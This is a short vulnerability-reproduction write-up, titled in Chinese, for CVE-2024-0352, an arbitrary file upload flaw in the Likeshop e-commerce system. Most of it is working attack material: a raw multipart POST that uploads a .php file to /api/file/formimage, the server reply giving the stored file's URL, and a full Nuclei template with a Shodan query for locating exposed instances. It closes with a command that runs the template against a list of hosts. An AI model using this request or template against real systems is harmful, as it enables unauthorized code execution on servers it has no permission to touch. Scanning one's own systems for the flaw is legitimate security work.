[漏洞复现]CVE-2024-0352

POST /api/file/formimage HTTP/1.1Host: 192.168.40.130User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeContent-Length: 201Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwteiAccept-Encoding: gzip
------WebKitFormBoundarygcflwteiContent-Disposition: form-data; name="file";filename="IE4MGP.php"Content-Type: application/x-php
2ayyhRXiAsKXL8olvF5s4qqyI2O------WebKitFormBoundarygcflwtei--

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Authorization, Sec-Fetch-Mode, DNT, X-Mx-ReqToken, Keep-Alive, User-Agent, If-Match, If-None-Match, If-Unmodified-Since, X-Requested-With, If-Modified-Since, Cache-Control, Content-Type, Accept-Language, Origin, Accept-Encoding,Access-Token,tokenAccess-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, postAccess-Control-Allow-Origin: *Access-Control-Max-Age: 1728000Content-Type: application/json; charset=utf-8Date: Mon, 15 Jan 2024 07:53:52 GMTServer: nginx
{"code":1,"msg":"上传文件成功","data":{"url":"http://192.168.40.130/uploads/user/20240114115352abad74281.php","base_url":"uploads/user/20240114115352abad74281.php","name":"IE4MGP.php"},"show":0,"time":"0.140024"}

id: CVE-2024-0352
info:  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload  author: CookieHanHoan,babybash,samuelsamuelsamuel  severity: high  description: |    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434  impact: |    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.  remediation: Update to the latest version  reference:    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352    - https://note.zhaoj.in/share/ciwYj7QXC4sZ    - https://vuldb.com/?ctiid.250120    - https://vuldb.com/?id.250120  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L    cvss-score: 7.3    cve-id: CVE-2024-0352    cwe-id: CWE-434  metadata:    verified: true    max-request: 1    vendor: likeshop    shodan-query: http.favicon.hash:874152924  tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusivevariables:  filename: "{{rand_base(6)}}"
http:  - raw:      - |        POST /api/file/formimage HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
        ------WebKitFormBoundarygcflwtei        Content-Disposition: form-data; name="file";filename="{{filename}}.php"        Content-Type: application/x-php
        {{randstr}}        ------WebKitFormBoundarygcflwtei--
    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, ""name":"{{filename}}.php"")'          - 'contains_all(body, "code":1", "base_url":"uploads\/user")'        condition: and
    extractors:      - type: json        part: body        json:          - ".data.url"# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950

.nuclei.exe -l data/Likeshop2.txt -t nuclei-templateshttpcves2024CVE-2024-0352.yaml